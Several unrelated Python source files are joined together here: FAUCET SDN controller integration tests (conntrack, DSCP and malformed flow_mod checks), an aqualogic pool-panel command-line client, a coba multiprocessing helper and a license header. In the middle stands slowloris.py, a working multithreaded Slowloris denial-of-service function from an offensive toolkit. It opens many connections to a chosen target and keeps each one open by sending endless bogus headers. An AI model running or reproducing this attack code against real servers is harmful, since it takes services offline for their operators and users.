        tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
        tcpdump_txt = self.tcpdump_helper(
            dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
            root_intf=True, packets=1)
        # verify that the packet we've received on the dest_host has the
        # overwritten values
        self.assertTrue(
            re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
                                         self.IPV4_DST_VAL, self.UDP_DST_PORT),
                      tcpdump_txt))
        # check the packet's converted dscp value
        self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))

    def test_set_fields_icmp(self):
        # Send a basic ICMP packet through the faucet pipeline and verify that
        # the expected fields were updated via tcpdump output
        source_host, dest_host = self.hosts_name_ordered()[0:2]
        dest_host.setMAC(self.OUTPUT_MAC)
        # scapy command to create and send an ICMP packet
        scapy_pkt = self.scapy_icmp(
            self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
            dest_host.IP(), dst=self.OUTPUT_MAC)
        tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
        tcpdump_txt = self.tcpdump_helper(
            dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
            root_intf=True, packets=1)
        # verify that the packet we've received on the dest_host has been
        # overwritten to be an ICMP echo request
        self.assertTrue(re.search("ICMP echo request", tcpdump_txt))

    def test_untagged(self):
        # Inherited ping test is not relevant when the ACL rewrites headers.
        pass
class FaucetConntrackMatchTest(FaucetUntaggedTest):
    """Test that untracked TCP packets can be matched with conntrack and blocked"""

    # Conntrack ACLs are only exercised on the software (OVS) datapath.
    SOFTWARE_ONLY = True

    # ct_state 0/0x20 matches packets with the "tracked" bit unset.
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            ct_state: 0/0x20
            actions:
                allow: 0
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untracked_tcp_blocked(self):
        # Wait for the untracked-TCP drop rule to be installed.
        self.wait_until_matching_flow(
            {'ct_state': '0/0x20',
             'eth_type': 0x0800,
             'ip_proto': 6},
            table_id=self._PORT_ACL_TABLE)
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        tcpdump_filter = ('tcp and port 1024')
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(f"nc -w 1 {second_host.IP()} 1024")])
        # The TCP SYN must have been dropped before reaching the second host.
        self.assertNotIn(f"{second_host.IP()}.1024: Flags [S]", tcpdump_txt)
        # The drop rule must have accounted for the blocked packets.
        self.wait_nonzero_packet_count_flow(
            {'ct_state': '0/0x20',
             'eth_type': 0x0800,
             'ip_proto': 6},
            table_id=self._PORT_ACL_TABLE)
class FaucetConntrackCommitTest(FaucetUntaggedTest):
    """Test that new TCP flows can be matched/tracked and committed to conntrack"""

    # Conntrack ACLs are only exercised on the software (OVS) datapath.
    SOFTWARE_ONLY = True

    # Rule 1: send untracked TCP (ct_state 0/0x20) through conntrack.
    # Rule 2: commit (flags: 1) tracked+new TCP (ct_state 0x21/0x21).
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            ct_state: 0/0x20
            actions:
                ct:
                    table: 0
                    zone: 1
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            ct_state: 0x21/0x21
            actions:
                ct:
                    flags: 1
                    table: 1
                    zone: 1
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_commit_tracked_tcp(self):
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        tcpdump_filter = ('tcp and port 1024')
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(f"nc -w 1 {second_host.IP()} 1024")])
        # Both CT rules must have matched packets from the TCP attempt.
        self.wait_nonzero_packet_count_flow(
            {'ct_state': '0/0x20',
             'eth_type': 0x0800,
             'ip_proto': 6},
            actions=['NX_CT: {flags: 0, zone: [1..17], table: 0, alg: 0, actions: []}'],
            table_id=self._PORT_ACL_TABLE)
        self.wait_nonzero_packet_count_flow(
            {'ct_state': '0x21/0x21',
             'eth_type': 0x0800,
             'ip_proto': 6},
            actions=['NX_CT: {flags: 1, zone: [1..17], table: 1, alg: 0, actions: []}'],
            table_id=self._PORT_ACL_TABLE)
        # Unlike the blocking test, the SYN must have been delivered.
        self.assertIn(f"{second_host.IP()}.1024: Flags [S]", tcpdump_txt)
class FaucetConntrackClearTest(FaucetUntaggedTest):
    """Verify clear flag can be set in CT action"""

    # Conntrack ACLs are only exercised on the software (OVS) datapath.
    SOFTWARE_ONLY = True

    # ACL 1 (applied at port 1) tracks and commits TCP flows; ACL 2
    # (applied at the VLAN via acl_in: 2) clears conntrack state from
    # already-tracked packets (ct_state 0x20/0x20).
    # Relies on the inherited test_untagged for exercise.
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
        acl_in: 2
acls:
    1:
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            ct_state: 0/0x20
            actions:
                ct:
                    table: 0
                    zone: 1
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            ct_state: 0x21/0x21
            actions:
                ct:
                    flags: 1
                    table: 1
                    zone: 1
        - rule:
            actions:
                allow: 1
    2:
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            ct_state: 0x20/0x20
            actions:
                ct:
                    clear: true
                allow: 1
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""
class FaucetConntrackNATTest(FaucetUntaggedTest):
    """Test that conntrack NAT action rewrites source IP address"""

    # Conntrack ACLs are only exercised on the software (OVS) datapath.
    SOFTWARE_ONLY = True

    # All TCP from port 1 is committed to conntrack with SNAT to
    # 192.0.2.250 (min == max pins a single translated address).
    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            eth_type: 0x0800
            ip_proto: 6
            actions:
                ct:
                    flags: 1
                    table: 1
                    zone: 1
                    nat:
                        flags: 1
                        range_ipv4_min: 192.0.2.250
                        range_ipv4_max: 192.0.2.250
        - rule:
            actions:
                allow: 1
"""

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_nat_tcp(self):
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[0:2]
        tcpdump_filter = ('tcp and port 1024')
        tcpdump_txt = self.tcpdump_helper(
            second_host, tcpdump_filter, [
                lambda: first_host.cmd(f"nc -w 1 {second_host.IP()} 1024")])
        # The SYN must arrive with the NATted source address.
        tcpdump_regex = re.escape("192.0.2.250.") + r"\d+" + \
            re.escape(f" > {second_host.IP()}.1024: Flags [S]")
        self.assertRegex(tcpdump_txt, tcpdump_regex)
class FaucetDscpMatchTest(FaucetUntaggedTest):
    # Match all packets with this IP_DSP and eth_type, based on the ryu API def
    # e.g {"ip_dscp": 3, "eth_type": 2048}
    # Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
    # see https://tools.ietf.org/html/rfc2474#section-3
    IP_DSCP_MATCH = 46
    ETH_TYPE = 2048
    SRC_MAC = '0e:00:00:00:00:ff'
    DST_MAC = '0e:00:00:00:00:02'
    # MAC written into eth_dst by the ACL for matching packets.
    REWRITE_MAC = '0f:00:12:23:48:03'

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            ip_dscp: %d
            dl_type: 0x800
            actions:
                allow: 1
                output:
                    set_fields:
                        - eth_dst: "%s"
        - rule:
            actions:
                allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        # Tests that a packet with an ip_dscp field will be appropriately
        # matched and proceeds through the faucet pipeline. This test verifies
        # that packets with the dscp field can have their eth_dst field modified
        source_host, dest_host = self.hosts_name_ordered()[0:2]
        dest_host.setMAC(self.REWRITE_MAC)
        self.wait_until_matching_flow(
            {'ip_dscp': self.IP_DSCP_MATCH,
             'eth_type': self.ETH_TYPE},
            table_id=self._PORT_ACL_TABLE)
        # scapy command to create and send a packet with the specified fields
        # (TOS 184 carries DSCP 46 in its upper six bits).
        scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
                                    source_host.defaultIntf())
        tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
        tcpdump_txt = self.tcpdump_helper(
            dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
            root_intf=True, packets=1)
        # verify that the packet we've received on the dest_host is from the
        # source MAC address
        self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
                                  tcpdump_txt))
class FaucetOrderedDscpMatchTest(FaucetUntaggedTest):
    # Match all packets with this IP_DSP and eth_type, based on the ryu API def
    # e.g {"ip_dscp": 3, "eth_type": 2048}
    # Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
    # see https://tools.ietf.org/html/rfc2474#section-3
    # (Same as FaucetDscpMatchTest, using ordered/list output action syntax.)
    IP_DSCP_MATCH = 46
    ETH_TYPE = 2048
    SRC_MAC = '0e:00:00:00:00:ff'
    DST_MAC = '0e:00:00:00:00:02'
    # MAC written into eth_dst by the ACL for matching packets.
    REWRITE_MAC = '0f:00:12:23:48:03'

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
acls:
    1:
        - rule:
            ip_dscp: %d
            dl_type: 0x800
            actions:
                allow: 1
                output:
                    - set_fields:
                        - eth_dst: "%s"
        - rule:
            actions:
                allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)

    CONFIG = """
        interfaces:
            %(port_1)d:
                native_vlan: 100
                acl_in: 1
            %(port_2)d:
                native_vlan: 100
            %(port_3)d:
                native_vlan: 100
            %(port_4)d:
                native_vlan: 100
"""

    def test_untagged(self):
        # Tests that a packet with an ip_dscp field will be appropriately
        # matched and proceeds through the faucet pipeline. This test verifies
        # that packets with the dscp field can have their eth_dst field modified
        source_host, dest_host = self.hosts_name_ordered()[0:2]
        dest_host.setMAC(self.REWRITE_MAC)
        self.wait_until_matching_flow(
            {'ip_dscp': self.IP_DSCP_MATCH,
             'eth_type': self.ETH_TYPE},
            table_id=self._PORT_ACL_TABLE)
        # scapy command to create and send a packet with the specified fields
        # (TOS 184 carries DSCP 46 in its upper six bits).
        scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
                                    source_host.defaultIntf())
        tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
        tcpdump_txt = self.tcpdump_helper(
            dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
            root_intf=True, packets=1)
        # verify that the packet we've received on the dest_host is from the
        # source MAC address
        self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
                                  tcpdump_txt))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutTest(FaucetUntaggedTest):
    """Verify learned-host flows expire via idle timeout and hosts are
    relearned afterwards."""

    CONFIG_GLOBAL = """
vlans:
    100:
        description: "untagged"
"""

    CONFIG = """
        timeout: 1
        use_idle_timeout: True
""" + CONFIG_BOILER_UNTAGGED

    def wait_for_host_removed(self, host, in_port, timeout=5):
        """Poll until host is no longer learned on in_port, or fail."""
        for _ in range(timeout):
            if not self.host_learned(host, in_port=in_port, timeout=1):
                return
        self.fail('host %s still learned' % host)

    def wait_for_flowremoved_msg(self, src_mac=None, dst_mac=None, timeout=30):
        """Wait for an OFPFlowRemoved for src_mac/dst_mac to appear in the
        OF channel debug logs."""
        pattern = "OFPFlowRemoved"
        mac = None
        if src_mac:
            pattern = "OFPFlowRemoved(.*)'eth_src': '%s'" % src_mac
            mac = src_mac
        if dst_mac:
            # dst_mac takes precedence if both are given.
            pattern = "OFPFlowRemoved(.*)'eth_dst': '%s'" % dst_mac
            mac = dst_mac
        for _ in range(timeout):
            for _, debug_log_name in self._get_ofchannel_logs():
                with open(debug_log_name, encoding='utf-8') as debug_log:
                    debug = debug_log.read()
                if re.search(pattern, debug):
                    return
            time.sleep(1)
        self.fail('Not received OFPFlowRemoved for host %s' % mac)

    def wait_for_host_log_msg(self, host_mac, msg):
        """Wait for FAUCET to log msg about host_mac."""
        host_log_re = r'.*%s %s.*' % (msg, host_mac)
        self.wait_until_matching_lines_from_faucet_log_files(host_log_re)

    def test_untagged(self):
        self.ping_all_when_learned()
        first_host, second_host = self.hosts_name_ordered()[:2]
        # Swapping MACs makes the previously learned flows stale, so they
        # must idle out and the hosts be relearned on their ports.
        self.swap_host_macs(first_host, second_host)
        for host, port in (
                (first_host, self.port_map['port_1']),
                (second_host, self.port_map['port_2'])):
            self.wait_for_flowremoved_msg(src_mac=host.MAC())
            self.require_host_learned(host, in_port=int(port))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutRuleExpiredTest(FaucetWithUseIdleTimeoutTest):
    """Verify an actively sending host is refreshed while idle hosts expire."""

    def test_untagged(self):
        """Host that is actively sending should have its dst rule renewed as the
        rule expires. Host that is not sending expires as usual.
        """
        self.ping_all_when_learned()
        first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()
        self.host_ipv4_alias(first_host, ipaddress.ip_interface('10.99.99.1/24'))
        first_host.cmd('arp -s %s %s' % (second_host.IP(), second_host.MAC()))
        # Keep the first host transmitting so its flows are refreshed.
        first_host.cmd('timeout 120s ping -I 10.99.99.1 %s &' % second_host.IP())
        # Silence the other hosts so their flows idle out.
        for host in (second_host, third_host, fourth_host):
            self.host_drop_all_ips(host)
        self.wait_for_host_log_msg(first_host.MAC(), 'refreshing host')
        self.assertTrue(self.host_learned(
            first_host, in_port=int(self.port_map['port_1'])))
        for host, port in (
                (second_host, self.port_map['port_2']),
                (third_host, self.port_map['port_3']),
                (fourth_host, self.port_map['port_4'])):
            self.wait_for_flowremoved_msg(src_mac=host.MAC())
            self.wait_for_host_log_msg(host.MAC(), 'expiring host')
            self.wait_for_host_removed(host, in_port=int(port))
class FaucetDisconnectTest(FaucetUntaggedTest):
    """Test that switch works properly after repeated disconnections
    caused by DPID mismatch"""

    def update_config(self, dpid):
        """Update config with good/bad DPID"""
        faucet_conf = self._get_faucet_conf()
        faucet_conf['dps'][self.DP_NAME]['dp_id'] = int(dpid)
        self.reload_conf(
            faucet_conf, self.faucet_config_path,
            restart=True, cold_start=False, change_expected=False)

    def test_untagged(self):
        """Run untagged test after disconnects and config update"""
        # Install a DPID that cannot match the switch, then wait for FAUCET
        # to log 'unknown datapath' - switch connections it has rejected
        # (the switch sees them as 'connection reset by peer').
        dpid_mask = (1 << 64) - 1
        wrong_dpid = (int(self.dpid) + 0xdeadbeef) & dpid_mask
        self.update_config(dpid=wrong_dpid)
        self.wait_until_matching_lines_from_faucet_log_files(
            r'.*ERROR.*unknown datapath', timeout=60, count=4)
        # Restore the correct DPID and confirm normal forwarding resumes.
        self.update_config(dpid=self.dpid)
        super().test_untagged()
class FaucetBadFlowModTest(FaucetUntaggedTest):
    """Test that switch and FAUCET still work after we send some bad flow_mods"""

    def base_flow_mod(self):
        """Return a base flow mod that we mess with"""
        return {'dpid': self.dpid,
                'cookie': 0,
                'cookie_mask': 0,
                'table_id': 0,
                'idle_timeout': 29,
                'hard_timeout': 91,
                'flags': 1,
                'priority': 1,
                'match': {'in_port': 1},
                'actions': [{
                    'type': 'OUTPUT',
                    'port': 2}]}

    # For now, the flow_mods are reasonably well-formed but with
    # parameters that are incorrect for the switch and for FAUCET

    def bad_dpid(self):
        """Return a random, bad dpid parameter"""
        # Random 64-bit offset from our own DPID, so it almost certainly
        # names a datapath FAUCET doesn't know about.
        mask = int(16 * 'f', 16)
        dpid = (int(self.dpid) + random.randint(0, 1 << 63)) & mask
        return {'dpid': dpid}

    @staticmethod
    def bad_table():
        """Return a bad table ID parameter"""
        # This should be higher than FAUCET's max table ID
        bad_table_start = 32
        return {'table_id': random.randint(bad_table_start, 100)}

    def bad_port(self):
        """Return a (hopefully very) bad port number"""
        # Offset well past any real port; masked to stay below the
        # OpenFlow reserved-port range.
        max_port = max(self.port_map.values())
        offset = random.randint(0x1000, 0xE0000000)
        mask = 0xEFFFFFFF
        return (max_port + offset) & mask

    def bad_match(self):
        """Return a bad match field"""
        matches = (
            # Bad input port
            {'in_port': self.bad_port()},
            # IPv4 (broadcast) src with bad ('reserved') ethertype
            {'nw_src': '255.255.255.255', 'dl_type': 0xFFFF},
            # IPv4 with IPv6 ethertype:
            {'nw_src': '1.2.3.4', 'dl_type': 0x86DD},
            # IPv4 address as IPv6 dst
            {'ipv6_dst': '1.2.3.4', 'dl_type': 0x86DD},
            # IPv6 dst with Bad/reserved ip_proto
            {'ipv6_dst': '2001::aaaa:bbbb:cccc:1111', 'ip_proto': 255},
            # Destination port but no transport protocol
            {'tp_dst': 80},
            # ARP opcode on non-ARP packet
            {'arp_op': 0x3, 'dl_type': 0x1234})
        match = random.sample(matches, 1)[0]
        return {'match': match}

    def bad_actions(self, count=1):
        """Return a questionable actions parameter"""
        actions = (
            {'type': 'OUTPUT', 'port': self.bad_port()},
            {'type': 'PUSH_MPLS', 'ethertype': 0x8BAD},
            {'type': 'SET_QUEUE', 'queue_id':
             random.randint(0x8000, 0xFFFFFFFF)})
        return {'actions': random.sample(actions, count)}

    # Possible options for bad parameters
    bad_options = ('dpid', 'table', 'match', 'actions')

    def bad_flow_mod(self):
        """Return a flow mod with some bad parameters"""
        flow_mod = self.base_flow_mod()
        # Add two or more bad options
        options = random.sample(self.bad_options,
                                random.randint(2, len(self.bad_options)))
        for option in options:
            # Dispatch to the matching bad_* generator above.
            param = getattr(self, 'bad_%s' % option)()
            flow_mod.update(param)
        return flow_mod

    def send_flow_mod(self, flow_mod, timeout=5):
        """Send flow_mod to switch via ofctl"""
        int_dpid = mininet_test_util.str_int_dpid(self.dpid)
        return self._ofctl_post(int_dpid, 'stats/flowentry/modify',
                                timeout=timeout, params=flow_mod)

    def tearDown(self, ignore_oferrors=True):
        """Ignore OF errors on teardown"""
        # The bad flow_mods are expected to provoke OpenFlow errors;
        # count and report them rather than failing the test run.
        oferrors = super().tearDown(ignore_oferrors)
        oferrors = re.findall(r'type: (\w+)', oferrors)
        counter = collections.Counter(oferrors)
        error('Ignored OF error count: %s\n' % dict(counter))
        # TODO: ensure at least one error is always generated.

    # pylint: disable=arguments-differ
    def test_untagged(self, count=10):
        """Send a bunch of bad flow mods, then verify connectivity"""
        for _ in range(count):
            flow_mod = self.bad_flow_mod()
            error('sending bad flow_mod', flow_mod, '\n')
            self.send_flow_mod(flow_mod)
        self.ping_all_when_learned()
class FaucetUntaggedMorePortsBase(FaucetUntaggedTest):
    """Base class for untagged test with more ports"""

    # pylint: disable=invalid-name
    N_UNTAGGED = 16  # Maximum number of ports to test
    EVENT_LOGGER_TIMEOUT = 180  # Timeout for event logger process

    # Config lines for additional ports
    CONFIG_EXTRA_PORT = """
            {port}:
                native_vlan: 100""" + "\n"

    def pre_start_net(self):
        """Extend config with more ports if needed"""
        self.assertTrue(self.CONFIG.endswith(CONFIG_BOILER_UNTAGGED))
        # We know how to extend the config for more ports
        base_port_count = len(re.findall('port', CONFIG_BOILER_UNTAGGED))
        ports = self.topo.dpid_ports(self.dpid)
        # Append an extra interface stanza for every port beyond the
        # boilerplate ones already present in CONFIG.
        for port in ports[base_port_count:]:
            self.CONFIG += self.CONFIG_EXTRA_PORT.format(port=port)
        super()._init_faucet_config()

    def setUp(self):
        """Make sure N_UNTAGGED doesn't exceed hw port count"""
        if self.config and self.config.get('hw_switch', False):
            self.N_UNTAGGED = min(len(self.config['dp_ports']),
                                  self.N_UNTAGGED)
        error('(%d ports) ' % self.N_UNTAGGED)
        super().setUp()
class FaucetSingleUntagged32PortTest(FaucetUntaggedMorePortsBase):
    """Untagged test with up to 32 ports"""

    # pylint: disable=invalid-name
    N_UNTAGGED = 32  # Maximum number of ports to test
@unittest.skip('slow and potentially unreliable on travis')
class FaucetSingleUntagged48PortTest(FaucetUntaggedMorePortsBase):
    """Untagged test with up to 48 ports"""

    # pylint: disable=invalid-name
    N_UNTAGGED = 48  # Maximum number of ports to test
    EVENT_LOGGER_TIMEOUT = 360  # Timeout for event logger process
|
slowloris.py | #!/usr/bin/env https://github.com/Tandelajr/mr.tandela
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
import socket
from threading import Thread
# Import modules for SLOWLORIS flood
import tools.randomData as randomData
def SLOWLORIS_ATTACK(threads, attack_time, target):
    """Run a Slowloris-style flood against `target` ("ip:port").

    Spawns `threads` worker threads. Each worker opens one TCP connection,
    sends a deliberately incomplete HTTP request, then keeps the connection
    occupied with an endless stream of bogus header lines until
    `attack_time` seconds have elapsed or the server drops the connection.
    """
    # Finish flag shared with the worker threads.
    global FINISH
    FINISH = False
    target_ip = target.split(":")[0]
    target_port = int(target.split(":")[1])
    print("\033[1;34m"+"[*]"+"\033[0m"+" Starting SLOWLORIS attack...")
    threads_list = []
    # SLOWLORIS flood
    def slowloris_flood():
        global FINISH
        # Init socket and send the incomplete request headers. The original
        # code let connect()/send() errors escape and kill the thread with a
        # traceback; report and give up instead.
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(4)
            sock.connect((target_ip, target_port))
            sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
            sock.send("User-Agent: {}\r\n".format(randomData.random_useragent()).encode("utf-8"))
            sock.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
        except socket.error:
            print("\033[1;31m"+"[-]"+"\033[0m"+" Failed to create socket!")
            return
        # This message was dead code before: it sat in an unreachable `else`
        # branch of `if not FINISH` inside `while not FINISH`.
        print("\033[1;34m"+"[*]"+"\033[0m"+" Sending packets to " + target + "...")
        while not FINISH:
            # Packet: keep the connection alive with a never-ending header.
            try:
                sock.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                # Server closed the connection - stop instead of looping
                # forever over a dead socket (the original behavior).
                print("\033[1;31m"+"[-]"+"\033[0m"+" Failed to create socket!")
                break
        sock.close()
    # Start threads
    for thread in range(0, threads):
        print("\033[1;34m"+"[*]"+"\033[0m"+" Starting thread " + str(thread) + "...")
        t = Thread(target = slowloris_flood)
        t.start()
        threads_list.append(t)
    # Sleep selected seconds
    time.sleep(attack_time)
    # Terminate threads (set the flag once, then wait for all workers)
    FINISH = True
    for thread in threads_list:
        thread.join()
    print("\033[1;77m"+"[i]"+"\033[0m"+" Attack completed.")
|
cli.py | """aqualogic command line test app."""
import threading
import logging
import sys
from core import AquaLogic
from states import States
logging.basicConfig(level=logging.INFO)
def _data_changed(panel):
    """Print the panel's current readings; called whenever new data arrives."""
    readings = (
        ('Pool Temp: {}', panel.pool_temp),
        ('Air Temp: {}', panel.air_temp),
        ('Pump Speed: {}', panel.pump_speed),
        ('Pump Power: {}', panel.pump_power),
        ('States: {}', panel.states()),
    )
    for template, value in readings:
        print(template.format(value))
    # Only show the check-system message while the panel reports that state.
    if panel.get_state(States.CHECK_SYSTEM):
        print('Check System: {}'.format(panel.check_system_msg))
# --- Command-line argument handling ---
# One argument: a serial port. Two arguments: host and TCP port.
if len(sys.argv) == 2:
    print('Connecting to {}...'.format(sys.argv[1]))
elif len(sys.argv) == 3:
    print('Connecting to {}:{}...'.format(sys.argv[1], sys.argv[2]))
else:
    print('Usage: cli [host] [port]')
    print(' [serial port]')
    # sys.exit() instead of quit(): quit() is injected by the `site` module
    # and is not guaranteed to exist in every interpreter invocation.
    sys.exit(1)

PANEL = AquaLogic()
if len(sys.argv) == 2:
    PANEL.connect_serial(sys.argv[1])
else:
    PANEL.connect(sys.argv[1], int(sys.argv[2]))
print('Connected!')
print('To toggle a state, type in the State name, e.g. LIGHTS')

# Background reader invokes _data_changed on every update from the panel.
READER_THREAD = threading.Thread(target=PANEL.process, args=[_data_changed])
READER_THREAD.start()

# Interactive loop: each input line names a state to toggle.
while True:
    try:
        LINE = input()
    except (EOFError, KeyboardInterrupt):
        # Exit cleanly when stdin closes or the user hits Ctrl-C, instead
        # of dying with a traceback.
        break
    try:
        STATE = States[LINE]
        PANEL.set_state(STATE, not PANEL.get_state(STATE))
    except KeyError:
        print('Invalid State name {}'.format(LINE))
|
multiprocessing.py | from threading import Thread
from multiprocessing import Manager, Queue, Lock, Condition, Semaphore
from typing import Iterable, Any, Dict
from coba.utilities import coba_exit
from coba.contexts import CobaContext, ConcurrentCacher, Logger, Cacher
from coba.pipes import Pipes, Filter, Sink, QueueIO, Multiprocessor, Foreach
class CobaMultiprocessor(Filter[Iterable[Any], Iterable[Any]]):
    """Run a filter over items in parallel worker processes while routing the
    workers' logging and stderr back to the parent process's logger."""

    class PipeStderr(Sink[Any]):
        """Forwards stderr items received from worker processes to the logger."""

        def write(self, item: Any) -> None:
            if isinstance(item,tuple):
                # NOTE(review): tuples appear to be structured error records and
                # only the third element is logged -- confirm the producer's format.
                CobaContext.logger.log(item[2])
            else:
                CobaContext.logger.log(item)

    class ProcessFilter:
        """Wraps a filter so CobaContext is re-established inside each worker process."""

        def __init__(self, filter: Filter, logger: Logger, cacher: Cacher, store: Dict[str,Any], logger_sink: Sink) -> None:
            self._filter = filter
            self._logger = logger
            self._cacher = cacher
            self._store = store
            self._logger_sink = logger_sink

        def filter(self, item: Any) -> Any:
            #placing this here means this is set inside the process
            CobaContext.logger = self._logger
            CobaContext.cacher = self._cacher
            CobaContext.store = self._store
            #at this point logger has been marshalled so we can
            #modify it without affecting the base process logger
            CobaContext.logger.sink = self._logger_sink
            try:
                return self._filter.filter(item)
            except Exception as e:
                # Log rather than propagate so one bad item doesn't kill the
                # worker; the method implicitly returns None in that case.
                CobaContext.logger.log(e)

    def __init__(self, filter: Filter, processes=1, maxtasksperchild=0) -> None:
        # processes/maxtasksperchild are passed straight through to the
        # underlying Multiprocessor in filter() below.
        self._filter = filter
        self._processes = processes
        self._maxtasksperchild = maxtasksperchild

    def filter(self, items: Iterable[Any]) -> Iterable[Any]:
        """Yield filtered items, processing them in worker processes."""
        try:
            with Manager() as manager:
                stdlog = QueueIO(Queue())
                stderr = CobaMultiprocessor.PipeStderr()
                # Daemon thread that drains worker log messages into the
                # parent logger's sink for the lifetime of this generator.
                log_thread = Thread(target=Pipes.join(stdlog,Foreach(CobaContext.logger.sink)).run)
                log_thread.daemon = True
                log_thread.start()
                logger = CobaContext.logger
                cacher = ConcurrentCacher(CobaContext.cacher, manager.dict(), Lock(), Condition())
                store = { "srcsema": Semaphore(2) }
                filter = CobaMultiprocessor.ProcessFilter(self._filter, logger, cacher, store, stdlog)
                for item in Multiprocessor(filter, self._processes, self._maxtasksperchild, stderr).filter(items):
                    yield item
                stdlog.write(None) #attempt to shutdown the logging process gracefully by sending the poison pill
        except RuntimeError as e: #pragma: no cover
            #This happens when importing main causes this code to run again
            coba_exit(str(e))
|
EventLoop.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
